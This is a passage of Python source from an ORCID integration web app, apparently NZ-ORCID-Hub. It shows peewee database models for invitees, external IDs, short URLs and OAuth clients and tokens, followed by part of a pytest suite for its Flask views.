"""Common model bits of the invitees records."""
identifier = CharField(max_length=120, null=True)
email = CharField(max_length=120, null=True)
first_name = CharField(max_length=120, null=True)
last_name = CharField(max_length=120, null=True)
orcid = OrcidIdField(null=True)
put_code = IntegerField(null=True)
visibility = CharField(null=True, max_length=100)
status = TextField(null=True, help_text="Record processing status.")
processed_at = DateTimeField(null=True)
def add_status_line(self, line):
"""Add a text line to the status for logging processing progress."""
ts = datetime.utcnow().isoformat(timespec="seconds")
self.status = (self.status + "\n" if self.status else '') + ts + ": " + line
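# Illustrative sketch of how add_status_line accumulates status text (timestamps and
# messages below are hypothetical):
#   rec.status is None  -> after add_status_line("queued"): "2018-01-01T00:00:00: queued"
#   rec.status set      -> a newline plus the next timestamped line is appended.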
class PeerReviewInvitee(InviteesModel):
"""Researcher or Invitee - related to peer review."""
peer_review_record = ForeignKeyField(
PeerReviewRecord, related_name="peer_review_invitee", on_delete="CASCADE")
class Meta: # noqa: D101,D106
db_table = "peer_review_invitee"
table_alias = "pi"
class WorkInvitees(InviteesModel):
"""Researcher or Invitees - related to work."""
work_record = ForeignKeyField(
WorkRecord, related_name="work_invitees", on_delete="CASCADE")
class Meta: # noqa: D101,D106
db_table = "work_invitees"
table_alias = "wi"
class FundingInvitees(InviteesModel):
"""Researcher or Invitees - related to funding."""
funding_record = ForeignKeyField(
FundingRecord, related_name="funding_invitees", on_delete="CASCADE")
class Meta: # noqa: D101,D106
db_table = "funding_invitees"
table_alias = "fi"
class ExternalIdModel(BaseModel):
"""Common model bits of the ExternalId records."""
type = CharField(max_length=255)
value = CharField(max_length=255)
url = CharField(max_length=200, null=True)
relationship = CharField(max_length=255, null=True)
class WorkExternalId(ExternalIdModel):
"""Work ExternalId loaded for batch processing."""
work_record = ForeignKeyField(
WorkRecord, related_name="external_ids", on_delete="CASCADE")
class Meta: # noqa: D101,D106
db_table = "work_external_id"
table_alias = "wei"
class PeerReviewExternalId(ExternalIdModel):
"""Peer Review ExternalId loaded for batch processing."""
peer_review_record = ForeignKeyField(
PeerReviewRecord, related_name="external_ids", on_delete="CASCADE")
class Meta: # noqa: D101,D106
db_table = "peer_review_external_id"
table_alias = "pei"
class ExternalId(ExternalIdModel):
"""Funding ExternalId loaded for batch processing."""
funding_record = ForeignKeyField(
FundingRecord, related_name="external_ids", on_delete="CASCADE")
class Meta: # noqa: D101,D106
db_table = "external_id"
table_alias = "ei"
class Url(BaseModel, AuditMixin):
"""Shortened URLs."""
short_id = CharField(unique=True, max_length=5)
url = TextField()
@classmethod
def shorten(cls, url):
"""Create a shorten url or retrievs an exiting one."""
try:
u = cls.get(url=url)
except cls.DoesNotExist:
while True:
short_id = ''.join(
random.choice(string.ascii_letters + string.digits) for _ in range(5))
try:
cls.get(short_id=short_id)
except cls.DoesNotExist:
u = cls.create(short_id=short_id, url=url)
return u
return u
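# Usage sketch (the URL below is a made-up example): repeated calls with the same URL
# return the same row, so short links stay stable.
#   u1 = Url.shorten("https://example.org/some/very/long/target")
#   u2 = Url.shorten("https://example.org/some/very/long/target")
#   assert u1.short_id == u2.short_id and len(u1.short_id) == 5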
class Funding(BaseModel):
"""Uploaded research Funding record."""
short_id = CharField(unique=True, max_length=5)
url = TextField()
class Client(BaseModel, AuditMixin):
"""API Client Application/Consumer.
A client is the app which wants to use the resource of a user.
It is suggested that the client is registered by a user on your site,
but it is not required.
"""
name = CharField(null=True, max_length=40, help_text="human readable name, not required")
homepage_url = CharField(null=True, max_length=100)
description = CharField(
null=True, max_length=400, help_text="human readable description, not required")
user = ForeignKeyField(
User, null=True, on_delete="SET NULL", help_text="creator of the client, not required")
org = ForeignKeyField(Organisation, on_delete="CASCADE", related_name="client_applications")
client_id = CharField(max_length=100, unique=True)
client_secret = CharField(max_length=55, unique=True)
is_confidential = BooleanField(null=True, help_text="public or confidential")
grant_type = CharField(max_length=18, default="client_credentials", null=True)
response_type = CharField(max_length=4, default="code", null=True)
_redirect_uris = TextField(null=True)
_default_scopes = TextField(null=True)
def save(self, *args, **kwargs): # noqa: D102
if self.is_dirty() and self.user_id is None and current_user:
self.user_id = current_user.id
return super().save(*args, **kwargs)
@property
def client_type(self): # noqa: D102
if self.is_confidential:
return 'confidential'
return 'public'
@property
def redirect_uris(self): # noqa: D102
if self._redirect_uris:
return self._redirect_uris.split()
return []
@redirect_uris.setter
def redirect_uris(self, value):
if value and isinstance(value, str):
self._redirect_uris = value
@property
def callback_urls(self): # noqa: D102
return self._redirect_uris
@callback_urls.setter
def callback_urls(self, value):
self._redirect_uris = value
@property
def default_redirect_uri(self): # noqa: D102
ru = self.redirect_uris
if not ru:
return None
return self.redirect_uris[0]
@property
def default_scopes(self): # noqa: D102
if self._default_scopes:
return self._default_scopes.split()
return []
def validate_scopes(self, scopes):
"""Validate client requested scopes."""
return "/webhook" in scopes or not scopes
def __repr__(self): # noqa: D102
return self.name or self.homepage_url or self.description
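# Property behaviour sketch (values are illustrative): _redirect_uris is a
# whitespace-separated string, so the derived properties work like this:
#   client._redirect_uris = "https://app.example/cb https://app.example/alt"
#   client.redirect_uris        -> ["https://app.example/cb", "https://app.example/alt"]
#   client.default_redirect_uri -> "https://app.example/cb"
#   client.validate_scopes([])  -> True; only "/webhook" is accepted as an explicit scope.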
class Grant(BaseModel):
"""Grant Token / Authorization Code.
A grant token is created in the authorization flow, and will be destroyed when
the authorization is finished. In this case, it would be better to store the data
in a cache, which leads to better performance.
"""
user = ForeignKeyField(User, on_delete="CASCADE")
# client_id = db.Column(
# db.String(40), db.ForeignKey('client.client_id'),
# nullable=False,
# )
client = ForeignKeyField(Client, index=True)
code = CharField(max_length=255, index=True)
redirect_uri = CharField(max_length=255, null=True)
expires = DateTimeField(null=True)
_scopes = TextField(null=True)
# def delete(self):
# super().delete().execute()
# return self
@property
def scopes(self): # noqa: D102
if self._scopes:
return self._scopes.split()
return []
@scopes.setter
def scopes(self, value): # noqa: D102
if isinstance(value, str):
self._scopes = value
else:
self._scopes = ' '.join(value)
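# Scope round-trip sketch (illustrative values): the setter accepts either a string or an
# iterable and stores a space-separated string; the getter splits it back into a list.
#   grant.scopes = ["/read-limited", "/activities/update"]
#   grant._scopes -> "/read-limited /activities/update"
#   grant.scopes  -> ["/read-limited", "/activities/update"]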
class Token(BaseModel):
"""Bearer Token.
A bearer token is the final token that could be used by the client.
There are other token types, but bearer token is widely used.
Flask-OAuthlib only comes with a bearer token.
"""
client = ForeignKeyField(Client)
user = ForeignKeyField(User, null=True, on_delete="SET NULL")
token_type = CharField(max_length=40)
access_token = CharField(max_length=100, unique=True)
refresh_token = CharField(max_length=100, unique=True, null=True)
expires = DateTimeField(null=True)
_scopes = TextField(null=True)
@property
def scopes(self): # noqa: D102
if self._scopes:
return self._scopes.split()
return []
@property
def expires_at(self): # noqa: D102
return self.expires
def readup_file(input_file):
"""Read up the whole content and deconde it and return the whole content."""
raw = input_file.read()
for encoding in "utf-8-sig", "utf-8", "utf-16":
try:
return raw.decode(encoding)
except UnicodeDecodeError:
continue
return raw.decode("latin-1")
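# Decoding sketch (file name is hypothetical): a UTF-8 file exported with a BOM decodes via
# "utf-8-sig" (BOM stripped); the other encodings are tried in turn, with Latin-1 as the
# final fallback so the call never raises.
#   with open("upload.csv", "rb") as f:
#       text = readup_file(f)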
def create_tables():
"""Create all DB tables."""
try:
db.connect()
except OperationalError:
pass
for model in [
File,
Organisation,
User,
UserOrg,
OrcidToken,
UserOrgAffiliation,
OrgInfo,
OrcidApiCall,
OrcidAuthorizeCall,
Task,
AffiliationRecord,
GroupIdRecord,
OrgInvitation,
Url,
UserInvitation,
FundingRecord,
WorkRecord,
WorkContributor,
WorkExternalId,
WorkInvitees,
FundingContributor,
FundingInvitees,
ExternalId,
PeerReviewRecord,
PeerReviewInvitee,
PeerReviewExternalId,
Client,
Grant,
Token,
]:
try:
model.create_table()
except (ProgrammingError, OperationalError) as ex:
if "already exists" in str(ex):
app.logger.info(f"Table '{model._meta.name}' already exists")
else:
raise ex
def create_audit_tables():
"""Create all DB audit tables for PostgreSQL DB."""
try:
db.connect()
except OperationalError:
pass
if isinstance(db, PostgresqlDatabase):
with open(os.path.join(os.path.dirname(__file__), "sql", "auditing.sql"), 'br') as input_file:
sql = readup_file(input_file)
db.commit()
with db.get_cursor() as cr:
cr.execute(sql)
db.commit()
def drop_tables():
"""Drop all model tables."""
for m in (Organisation, User, UserOrg, OrcidToken, UserOrgAffiliation, OrgInfo, OrgInvitation,
OrcidApiCall, OrcidAuthorizeCall, Task, AffiliationRecord, Url, UserInvitation):
if m.table_exists():
try:
m.drop_table(fail_silently=True, cascade=m._meta.database.drop_cascade)
except OperationalError:
pass
def load_yaml_json(filename, source):
"""Create a common way of loading json or yaml file."""
if os.path.splitext(filename)[1][1:] in ("yaml", "yml"):
data_list = yaml.load(source)
else:
data_list = json.loads(source)
# Removing None for correct schema validation
if not isinstance(data_list, list):
raise SchemaError(
u"Schema validation failed:\n - Expecting a list of Records")
return data_list
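# Dispatch sketch (file names and payloads are illustrative): the extension selects the
# parser and the result must be a list of records.
#   load_yaml_json(filename="works.json", source='[{"title": "T"}]')  -> [{"title": "T"}]
#   load_yaml_json(filename="works.yaml", source="- title: T")        -> [{"title": "T"}]
#   load_yaml_json(filename="works.json", source='{"title": "T"}')    -> raises SchemaError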
def del_none(d):
"""
Recursively delete keys whose value is ``None`` from a dictionary,
so that schema validation does not fail on elements that are absent.
"""
for key, value in list(d.items()):
if value is None:
del d[key]
elif isinstance(value, list):
for item in value:
if isinstance(item, dict):
del_none(item)
elif isinstance(value, dict):
del_none(value)
return d
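# Behaviour sketch (made-up payload): None values are pruned at every nesting level,
# including inside dictionaries held in lists.
#   del_none({"a": None, "b": {"c": None, "d": 1}, "e": [{"f": None}]})
#   -> {"b": {"d": 1}, "e": [{}]}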
def get_val(d, *keys, default=None):
"""To get the value from uploaded fields."""
for k in keys:
if not d:
break
d = d.get(k, default)
return d
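# Lookup sketch (keys mirror the upload format, values are illustrative): the walk stops as
# soon as an intermediate value is missing or falsy, so deep lookups never raise.
#   get_val({"journal-title": {"value": "J"}}, "journal-title", "value")  -> "J"
#   get_val({"journal-title": None}, "journal-title", "value")           -> None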
```
#### File: NZ-ORCID-Hub/tests/test_views.py
```python
import datetime
import json
import logging
import os
import sys
import time
from itertools import product
from unittest.mock import MagicMock, patch
from io import BytesIO
import pytest
from flask import request, make_response
from flask_login import login_user
from peewee import SqliteDatabase
from playhouse.test_utils import test_database
from werkzeug.datastructures import ImmutableMultiDict
from orcid_hub import app, orcid_client, rq, views
from orcid_hub.config import ORCID_BASE_URL
from orcid_hub.forms import FileUploadForm
from orcid_hub.models import UserOrgAffiliation # noqa: E128
from orcid_hub.models import (Affiliation, AffiliationRecord, Client, File, FundingRecord,
OrcidToken, Organisation, OrgInfo, Role, Task, Token, Url, User,
UserInvitation, UserOrg, PeerReviewRecord, WorkRecord)
fake_time = time.time()
logger = logging.getLogger(__name__)
logger.setLevel(logging.INFO)
logger.addHandler(logging.StreamHandler())
@pytest.fixture
def test_db():
"""Test to check db."""
_db = SqliteDatabase(":memory:")
with test_database(
_db, (
Organisation,
User,
UserOrg,
OrcidToken,
UserOrgAffiliation,
Task,
AffiliationRecord,
),
fail_silently=True) as _test_db:
yield _test_db
return
@pytest.fixture
def test_models(test_db):
"""Test to check models."""
Organisation.insert_many((dict(
name="Organisation #%d" % i,
tuakiri_name="Organisation #%d" % i,
orcid_client_id="client-%d" % i,
orcid_secret="secret-%d" % i,
confirmed=(i % 2 == 0)) for i in range(10))).execute()
User.insert_many((dict(
name="Test User #%d" % i,
first_name="Test_%d" % i,
last_name="User_%d" % i,
email="<EMAIL>" % (i, i * 4 % 10),
confirmed=(i % 3 != 0),
roles=Role.SUPERUSER if i % 42 == 0 else Role.ADMIN if i % 13 == 0 else Role.RESEARCHER)
for i in range(60))).execute()
UserOrg.insert_many((dict(is_admin=((u + o) % 23 == 0), user=u, org=o)
for (u, o) in product(range(2, 60, 4), range(2, 10)))).execute()
UserOrg.insert_many((dict(is_admin=True, user=43, org=o) for o in range(1, 11))).execute()
OrcidToken.insert_many((dict(
user=User.get(id=1),
org=Organisation.get(id=1),
scope="/read-limited",
access_token="Test_%d" % i) for i in range(60))).execute()
UserOrgAffiliation.insert_many((dict(
user=User.get(id=1),
organisation=Organisation.get(id=1),
department_name="Test_%d" % i,
department_city="Test_%d" % i,
role_title="Test_%d" % i,
path="Test_%d" % i,
put_code="%d" % i) for i in range(30))).execute()
yield test_db
def test_superuser_view_access(request_ctx):
"""Test if SUPERUSER can access Flask-Admin"."""
with request_ctx("/admin/schedude/") as ctx:
rv = ctx.app.full_dispatch_request()
assert rv.status_code == 403
assert b"403" in rv.data
user = User.create(
name="<NAME>",
email="<EMAIL>",
roles=Role.SUPERUSER,
username="test42",
confirmed=True)
with request_ctx("/admin/user/") as ctx:
login_user(user, remember=True)
rv = ctx.app.full_dispatch_request()
assert rv.status_code == 200
assert b"User" in rv.data
with request_ctx(f"/admin/user/edit/?id={user.id}") as ctx:
login_user(user, remember=True)
rv = ctx.app.full_dispatch_request()
assert rv.status_code == 200
assert b"TEST USER" in rv.data
with request_ctx("/admin/schedude/") as ctx:
login_user(user, remember=True)
rv = ctx.app.full_dispatch_request()
assert rv.status_code == 200
assert b"interval" in rv.data
jobs = rq.get_scheduler().get_jobs()
with request_ctx(f"/admin/schedude/details/?id={jobs[0].id}") as ctx:
login_user(user, remember=True)
rv = ctx.app.full_dispatch_request()
assert rv.status_code == 200
assert b"interval" in rv.data
def test_admin_view_access_fail(client, request_ctx):
"""Test if non SUPERUSER cannot access Flask-Admin"."""
rv = client.get("/admin/user/")
assert rv.status_code == 302
assert "next=" in rv.location and "admin" in rv.location
with request_ctx("/admin/user/") as ctx:
test_user = User(
name="<NAME>", email="<EMAIL>", username="test42", confirmed=True)
login_user(test_user, remember=True)
rv = ctx.app.full_dispatch_request()
assert rv.status_code == 302
assert "next=" in rv.location and "admin" in rv.location
def test_access(request_ctx):
"""Test access to differente resources."""
test_superuser = User.create(
name="<NAME>",
email="<EMAIL>",
username="test42",
confirmed=True,
roles=Role.SUPERUSER)
test_user = User.create(
name="<NAME>",
email="<EMAIL>",
username="test123456789",
confirmed=True,
roles=Role.RESEARCHER)
with request_ctx("/pyinfo") as ctx:
rv = ctx.app.full_dispatch_request()
assert rv.status_code == 302
with request_ctx("/rq") as ctx:
rv = ctx.app.full_dispatch_request()
assert rv.status_code == 401
assert b"401" in rv.data
with request_ctx("/rq?next=http://orcidhub.org.nz/next") as ctx:
rv = ctx.app.full_dispatch_request()
assert rv.status_code == 302
assert rv.location == "http://orcidhub.org.nz/next"
with request_ctx("/pyinfo") as ctx:
login_user(test_superuser, remember=True)
rv = ctx.app.full_dispatch_request()
assert rv.status_code == 200
assert bytes(sys.version, encoding="utf-8") in rv.data
with request_ctx("/pyinfo") as ctx:
login_user(test_user, remember=True)
rv = ctx.app.full_dispatch_request()
assert rv.status_code == 302
with request_ctx("/rq") as ctx:
login_user(test_superuser, remember=True)
rv = ctx.app.full_dispatch_request()
assert rv.status_code == 200
assert b"Queues" in rv.data
with request_ctx("/rq") as ctx:
login_user(test_user, remember=True)
rv = ctx.app.full_dispatch_request()
assert rv.status_code == 403
assert b"403" in rv.data
with request_ctx("/rq?next=http://orcidhub.org.nz/next") as ctx:
login_user(test_user, remember=True)
rv = ctx.app.full_dispatch_request()
assert rv.status_code == 302
assert rv.location == "http://orcidhub.org.nz/next"
def test_year_range():
"""Test Jinja2 filter."""
assert views.year_range({"start_date": None, "end_date": None}) == "unknown-present"
assert views.year_range({
"start_date": {
"year": {
"value": "1998"
},
"whatever": "..."
},
"end_date": None
}) == "1998-present"
assert views.year_range({
"start_date": {
"year": {
"value": "1998"
},
"whatever": "..."
},
"end_date": {
"year": {
"value": "2001"
},
"whatever": "..."
}
}) == "1998-2001"
def test_user_orcid_id_url():
"""Test to get orcid url."""
u = User(
email="<EMAIL>",
name="<NAME>",
username="test123",
roles=Role.RESEARCHER,
orcid="123",
confirmed=True)
assert (views.user_orcid_id_url(u) == ORCID_BASE_URL + "123")
u.orcid = None
assert (views.user_orcid_id_url(u) == "")
def test_show_record_section(request_ctx):
"""Test to show selected record."""
admin = User.get(email="<EMAIL>")
user = User.get(email="<EMAIL>")
if not user.orcid:
user.orcid = "XXXX-XXXX-XXXX-0001"
user.save()
OrcidToken.create(user=user, org=user.organisation, access_token="ABC123")
with patch.object(
orcid_client.MemberAPIV20Api,
"view_employments",
MagicMock(return_value=make_fake_response('{"test": "TEST1234567890"}'))
) as view_employments, request_ctx(f"/section/{user.id}/EMP/list") as ctx:
login_user(admin)
resp = ctx.app.full_dispatch_request()
assert admin.email.encode() in resp.data
assert admin.name.encode() in resp.data
view_employments.assert_called_once_with("XXXX-XXXX-XXXX-0001")
with patch.object(
orcid_client.MemberAPIV20Api,
"view_educations",
MagicMock(return_value=make_fake_response('{"test": "TEST1234567890"}'))
) as view_educations, request_ctx(f"/section/{user.id}/EDU/list") as ctx:
login_user(admin)
resp = ctx.app.full_dispatch_request()
assert admin.email.encode() in resp.data
assert admin.name.encode() in resp.data
view_educations.assert_called_once_with("XXXX-XXXX-XXXX-0001")
def test_status(client):
"""Test status is workinkg both when DB is accessible or not."""
with patch("orcid_hub.views.db") as db: # , request_ctx("/status") as ctx:
result = MagicMock()
result.fetchone.return_value = (datetime.datetime(2042, 1, 1, 0, 0), )
db.execute_sql.return_value = result
rv = client.get("/status")
data = json.loads(rv.data)
assert rv.status_code == 200
assert data["status"] == "Connection successful."
assert data["db-timestamp"] == "2042-01-01T00:00:00"
with patch("orcid_hub.views.db") as db: # , request_ctx("/status") as ctx:
db.execute_sql.side_effect = Exception("FAILURE")
rv = client.get("/status")
data = json.loads(rv.data)
assert rv.status_code == 503
assert data["status"] == "Error"
assert "FAILURE" in data["message"]
def test_application_registration(app, request_ctx):
"""Test application registration."""
org = Organisation.create(
can_use_api=True,
name="THE ORGANISATION",
tuakiri_name="THE ORGANISATION",
confirmed=True,
orcid_client_id="CLIENT ID",
orcid_secret="Client Secret",
city="CITY",
country="COUNTRY",
disambiguated_id="ID",
disambiguation_source="SOURCE")
user = User.create(
email="<EMAIL>",
name="TEST USER",
roles=Role.TECHNICAL,
orcid="123",
organisation_id=1,
confirmed=True,
organisation=org)
UserOrg.create(user=user, org=org, is_admin=True)
org.update(tech_contact=user).execute()
with request_ctx(
"/settings/applications",
method="POST",
data={
"homepage_url": "http://test.at.test",
"description": "TEST APPLICATION 123",
"register": "Register",
}) as ctx: # noqa: F405
login_user(user, remember=True)
resp = ctx.app.full_dispatch_request()
with pytest.raises(Client.DoesNotExist):
Client.get(name="TEST APP")
assert resp.status_code == 200
with request_ctx(
"/settings/applications",
method="POST",
data={
"name": "TEST APP",
"homepage_url": "http://test.at.test",
"description": "TEST APPLICATION 123",
"register": "Register",
}) as ctx: # noqa: F405
login_user(user, remember=True)
rv = ctx.app.full_dispatch_request()
c = Client.get(name="TEST APP")
assert c.homepage_url == "http://test.at.test"
assert c.description == "TEST APPLICATION 123"
assert c.user == user
assert c.org == org
assert c.client_id
assert c.client_secret
assert rv.status_code == 302
client = Client.get(name="TEST APP")
with request_ctx(f"/settings/applications/{client.id}") as ctx:
login_user(user, remember=True)
resp = ctx.app.full_dispatch_request()
assert resp.status_code == 302
assert resp.location == f"/settings/credentials/{client.id}"
with request_ctx("/settings/credentials") as ctx:
login_user(user, remember=True)
resp = ctx.app.full_dispatch_request()
assert resp.status_code == 200
with request_ctx(f"/settings/credentials/{client.id}") as ctx:
login_user(user, remember=True)
resp = ctx.app.full_dispatch_request()
assert resp.status_code == 200
with request_ctx("/settings/credentials/99999999999999") as ctx:
login_user(user, remember=True)
resp = ctx.app.full_dispatch_request()
assert resp.status_code == 302
assert resp.location == "/settings/applications"
with request_ctx(
f"/settings/credentials/{client.id}", method="POST", data={
"revoke": "Revoke",
"name": client.name,
}) as ctx:
login_user(user, remember=True)
Token.create(client=client, token_type="TEST", access_token="<PASSWORD>")
resp = ctx.app.full_dispatch_request()
assert resp.status_code == 200
assert Token.select().where(Token.client == client).count() == 0
with request_ctx(
f"/settings/credentials/{client.id}", method="POST", data={
"reset": "Reset",
"name": client.name,
}) as ctx:
login_user(user, remember=True)
old_client = client
resp = ctx.app.full_dispatch_request()
client = Client.get(name="TEST APP")
assert resp.status_code == 200
assert client.client_id != old_client.client_id
assert client.client_secret != old_client.client_secret
with request_ctx(
f"/settings/credentials/{client.id}", method="POST", data={
"update_app": "Update",
"name": "NEW APP NAME",
"homepage_url": "http://test.test0.edu",
"description": "DESCRIPTION",
"callback_urls": "http://test0.edu/callback",
}) as ctx:
login_user(user, remember=True)
old_client = client
resp = ctx.app.full_dispatch_request()
client = Client.get(id=client.id)
assert resp.status_code == 200
assert client.name == "NEW APP NAME"
with request_ctx(
f"/settings/credentials/{client.id}", method="POST", data={
"delete": "Delete",
"name": "NEW APP NAME",
}) as ctx:
login_user(user, remember=True)
old_client = client
resp = ctx.app.full_dispatch_request()
assert resp.status_code == 302
assert resp.location == "/settings/applications"
assert not Client.select().where(Client.id == client.id).exists()
def make_fake_response(text, *args, **kwargs):
"""Mock out the response object returned by requests_oauthlib.OAuth2Session.get(...)."""
mm = MagicMock(name="response")
mm.text = text
if "json" in kwargs:
mm.json.return_value = kwargs["json"]
else:
mm.json.return_value = json.loads(text)
if "status_code" in kwargs:
mm.status_code = kwargs["status_code"]
return mm
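# Usage sketch (values are illustrative): the helper builds the minimal response surface the
# views touch, i.e. .text, .json() and optionally .status_code.
#   resp = make_fake_response('{"test": "X"}')
#   resp.json()                                                          -> {"test": "X"}
#   make_fake_response("", json={"ok": 1}, status_code=201).status_code  -> 201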
def test_short_url(request_ctx):
"""Test short url."""
short_url = Url.shorten("https://HOST/confirm/organisation/ABCD1234")
with request_ctx("/u/" + short_url.short_id) as ctx:
resp = ctx.app.full_dispatch_request()
assert resp.status_code == 302
assert resp.location == "https://HOST/confirm/organisation/ABCD1234"
with request_ctx("/u/" + short_url.short_id + "?param=PARAM123") as ctx:
resp = ctx.app.full_dispatch_request()
assert resp.status_code == 302
assert resp.location == "https://HOST/confirm/organisation/ABCD1234?param=PARAM123"
with request_ctx("/u/DOES_NOT_EXIST") as ctx:
resp = ctx.app.full_dispatch_request()
assert resp.status_code == 404
def test_load_org(request_ctx):
"""Test load organisation."""
root = User.get(email="<EMAIL>")
with request_ctx("/load/org") as ctx:
login_user(root, remember=True)
resp = ctx.app.full_dispatch_request()
assert resp.status_code == 200
assert b"<!DOCTYPE html>" in resp.data, "Expected HTML content"
def test_read_uploaded_file(request_ctx):
"""Test Uploading File."""
with request_ctx() as ctxx:
form = FileUploadForm()
form.file_.name = "conftest.py"
with open(os.path.join(os.path.dirname(os.path.realpath(__file__)), 'conftest.py'),
'rb') as f:
request.files = {'conftest.py': f}
ctxx = views.read_uploaded_file(form)
assert "@pytest.fixture" in ctxx
def test_user_orgs_org(request_ctx):
"""Test add an organisation to the user."""
org = Organisation.create(
name="THE ORGANISATION",
tuakiri_name="THE ORGANISATION",
confirmed=False,
orcid_client_id="CLIENT ID",
orcid_secret="Client Secret",
city="CITY",
country="COUNTRY",
disambiguated_id="ID",
disambiguation_source="SOURCE",
is_email_sent=True)
user = User.create(
email="<EMAIL>",
name="TEST USER",
roles=Role.SUPERUSER,
orcid="123",
confirmed=True,
organisation=org)
with request_ctx(
f"/hub/api/v0.1/users/{user.id}/orgs/",
data=json.dumps({
"id": org.id,
"name": org.name,
"is_admin": True,
"is_tech_contact": True
}),
method="POST",
content_type="application/json") as ctx:
login_user(user, remember=True)
resp = ctx.app.full_dispatch_request()
assert resp.status_code == 201
assert User.get(id=user.id).roles & Role.ADMIN
organisation = Organisation.get(name="THE ORGANISATION")
# User becomes the technical contact of the organisation.
assert organisation.tech_contact == user
resp = ctx.app.full_dispatch_request()
assert resp.status_code == 200
assert UserOrg.select().where(UserOrg.user == user, UserOrg.org == org,
UserOrg.is_admin).exists()
with request_ctx(f"/hub/api/v0.1/users/{user.id}/orgs/{org.id}", method="DELETE") as ctx:
# Delete user and organisation association
login_user(user, remember=True)
resp = ctx.app.full_dispatch_request()
assert resp.status_code == 204
data = json.loads(resp.data)
user = User.get(id=user.id)
assert data["status"] == "DELETED"
assert user.organisation_id is None
assert not (user.roles & Role.ADMIN)
assert not UserOrg.select().where(UserOrg.user == user, UserOrg.org == org).exists()
def test_user_orgs(request_ctx):
"""Test add an organisation to the user."""
org = Organisation.create(
name="THE ORGANISATION",
tuakiri_name="THE ORGANISATION",
confirmed=False,
orcid_client_id="CLIENT ID",
orcid_secret="Client Secret",
city="CITY",
country="COUNTRY",
disambiguated_id="ID",
disambiguation_source="SOURCE",
is_email_sent=True)
user = User.create(
email="<EMAIL>",
name="TEST USER",
roles=Role.SUPERUSER,
orcid="123",
confirmed=True,
organisation=org)
UserOrg.create(user=user, org=org, is_admin=True)
with request_ctx(f"/hub/api/v0.1/users/{user.id}/orgs/") as ctx:
login_user(user, remember=True)
rv = ctx.app.full_dispatch_request()
assert rv.status_code == 200
with request_ctx(f"/hub/api/v0.1/users/{user.id}/orgs/{org.id}") as ctx:
login_user(user, remember=True)
rv = ctx.app.full_dispatch_request()
assert rv.status_code == 200
with request_ctx("/hub/api/v0.1/users/1234/orgs/") as ctx:
# failure test case, user not found
login_user(user, remember=True)
rv = ctx.app.full_dispatch_request()
assert rv.status_code == 404
def test_api_credentials(request_ctx):
"""Test manage API credentials.."""
org = Organisation.create(
name="THE ORGANISATION",
tuakiri_name="THE ORGANISATION",
confirmed=False,
orcid_client_id="CLIENT ID",
orcid_secret="Client Secret",
city="CITY",
country="COUNTRY",
disambiguated_id="ID",
disambiguation_source="SOURCE",
is_email_sent=True)
user = User.create(
email="<EMAIL>",
name="TEST USER",
roles=Role.TECHNICAL,
orcid="123",
confirmed=True,
organisation=org)
UserOrg.create(user=user, org=org, is_admin=True)
Client.create(
name="Test_client",
user=user,
org=org,
client_id="requestd_client_id",
client_secret="xyz",
is_confidential="public",
grant_type="client_credentials",
response_type="xyz")
with request_ctx(
method="POST",
data={
"name": "<NAME>",
"homepage_url": "http://test.at.test",
"description": "TEST APPLICATION 123",
"register": "Register",
"reset": "xyz"
}):
login_user(user, remember=True)
resp = views.api_credentials()
assert "<EMAIL>" in resp
with request_ctx(method="POST", data={"name": "TEST APP", "delete": "xyz"}):
login_user(user, remember=True)
resp = views.api_credentials()
assert resp.status_code == 302
assert "application" in resp.location
def test_page_not_found(request_ctx):
"""Test handle nonexistin pages."""
with request_ctx("/this/does/not/exist") as ctx:
resp = ctx.app.full_dispatch_request()
assert resp.status_code == 404
assert b"Sorry, that page doesn't exist." in resp.data
with request_ctx("/this/does/not/exist/?url=/something/else") as ctx:
resp = ctx.app.full_dispatch_request()
assert resp.status_code == 302
assert resp.location == "/something/else"
def test_favicon(request_ctx):
"""Test favicon."""
with request_ctx("/favicon.ico") as ctx:
resp = ctx.app.full_dispatch_request()
assert resp.status_code == 200
assert resp.mimetype == "image/vnd.microsoft.icon"
def send_mail_mock(*argvs, **kwargs):
"""Mock email invitation."""
app.logger.info(f"***\nActually email invitation was mocked, so no email sent!!!!!")
return True
@patch("orcid_hub.utils.send_email", side_effect=send_mail_mock)
def test_action_invite(patch, request_ctx):
"""Test handle nonexistin pages."""
org = Organisation.create(
name="THE ORGANISATION",
tuakiri_name="THE ORGANISATION",
confirmed=False,
orcid_client_id="CLIENT ID",
orcid_secret="Client Secret",
city="CITY",
country="COUNTRY",
disambiguated_id="ID",
disambiguation_source="SOURCE",
is_email_sent=True)
user = User.create(
email="<EMAIL>",
name="TEST USER",
roles=Role.TECHNICAL,
orcid="123",
confirmed=True,
organisation=org)
UserOrg.create(user=user, org=org, is_admin=True)
org_info = OrgInfo.create(
name="Test_client",
tuakiri_name="xyz",
title="mr",
first_name="xyz",
last_name="xyz",
role="lead",
email="<EMAIL>",
phone="121",
is_public=True,
country="NZ",
city="Auckland",
disambiguated_id="123",
disambiguation_source="ringgold")
with request_ctx():
login_user(user, remember=True)
views.OrgInfoAdmin.action_invite(OrgInfo, ids=[org_info.id])
# New organisation is created from OrgInfo and user is added with Admin role
org2 = Organisation.get(name="Test_client")
assert user.is_admin_of(org2)
assert Role.ADMIN in user.roles
def test_shorturl(request_ctx):
"""Test short url."""
url = "http://localhost/xsdsdsfdds"
with request_ctx():
rv = views.shorturl(url)
assert "http://" in rv
def test_activate_all(request_ctx):
"""Test batch registraion of users."""
org = Organisation.create(
name="THE ORGANISATION",
tuakiri_name="THE ORGANISATION",
confirmed=False,
orcid_client_id="CLIENT ID",
orcid_secret="Client Secret",
city="CITY",
country="COUNTRY",
disambiguated_id="ID",
disambiguation_source="SOURCE",
is_email_sent=True)
user = User.create(
email="<EMAIL>",
name="TEST USER",
roles=Role.TECHNICAL,
orcid=123,
organisation_id=1,
confirmed=True,
organisation=org)
UserOrg.create(user=user, org=org, is_admin=True)
task1 = Task.create(
org=org,
completed_at="12/12/12",
filename="xyz.txt",
created_by=user,
updated_by=user,
task_type=0)
task2 = Task.create(
org=org,
completed_at="12/12/12",
filename="xyz.txt",
created_by=user,
updated_by=user,
task_type=1)
with request_ctx("/activate_all", method="POST") as ctxx:
login_user(user, remember=True)
request.args = ImmutableMultiDict([('url', 'http://localhost/affiliation_record_activate_for_batch')])
request.form = ImmutableMultiDict([('task_id', task1.id)])
rv = ctxx.app.full_dispatch_request()
assert rv.status_code == 302
assert rv.location.startswith("http://localhost/affiliation_record_activate_for_batch")
with request_ctx("/activate_all", method="POST") as ctxx:
login_user(user, remember=True)
request.args = ImmutableMultiDict([('url', 'http://localhost/funding_record_activate_for_batch')])
request.form = ImmutableMultiDict([('task_id', task2.id)])
